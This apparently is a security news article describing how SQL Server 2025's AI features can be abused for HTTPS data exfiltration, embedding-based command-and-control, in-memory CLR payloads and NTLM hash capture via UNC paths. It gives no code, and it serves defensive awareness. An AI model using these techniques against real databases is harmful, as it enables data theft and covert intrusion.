Microsoft’s SQL Server 2025 introduces advanced AI capabilities designed to enhance data processing and integration. However, these features have inadvertently opened new avenues for cyber attackers to exfiltrate sensitive data and establish covert command-and-control (C2) channels directly from the database engine.
Security researchers have identified that the stored procedure sp_invoke_external_rest_endpoint allows SQL Server to send HTTPS requests to external endpoints without relying on traditional methods like xp_cmdshell or PowerShell. While intended for legitimate API communications, this function can be misused by attackers to transmit large datasets, such as user credentials or entire database records, over encrypted channels. The procedure supports payloads up to 100 MB, facilitating efficient data exfiltration.
In a demonstrated attack scenario, a compromised SQL Server instance with sysadmin privileges can query sensitive tables, convert the data to JSON format, and transmit it to an attacker-controlled server using sp_invoke_external_rest_endpoint. Since the traffic originates from the database engine and utilizes HTTPS, it can evade traditional monitoring tools that typically detect suspicious command executions or unusual outbound connections.
Another significant feature, CREATE EXTERNAL MODEL, enables SQL Server to integrate with external AI models. This is complemented by AI_GENERATE_EMBEDDINGS, which sends data to these models and receives structured responses. While these functions are designed for AI-driven applications, researchers have demonstrated that they can be exploited to establish covert communication channels. Attackers can encode commands and responses within AI embedding data, making the traffic appear legitimate and difficult to detect. This technique allows for a new form of C2 infrastructure operating entirely within SQL queries.
By combining external model calls with periodic check-ins, attackers can create persistent backdoors that execute commands and return results without deploying traditional malware. In more advanced scenarios, malicious .NET CLR assemblies can be loaded directly into SQL Server memory, eliminating the need for disk-based payloads and further reducing detection risk.
Additionally, researchers have highlighted a technique involving UNC paths in AI model configurations, which can trigger NTLM authentication attempts over SMB. This behavior allows attackers to capture or relay authentication hashes within a network. Although reported to Microsoft, this behavior was not classified as a security vulnerability, leaving it unaddressed.
These findings underscore the dual-use nature of advanced features in enterprise software. While AI integrations in SQL Server 2025 offer significant benefits for data processing and application development, they also introduce potential security risks if not properly managed. Organizations must implement robust monitoring and access controls to prevent the misuse of these features. Regular audits and updates to security protocols are essential to mitigate the risks associated with these advanced capabilities.
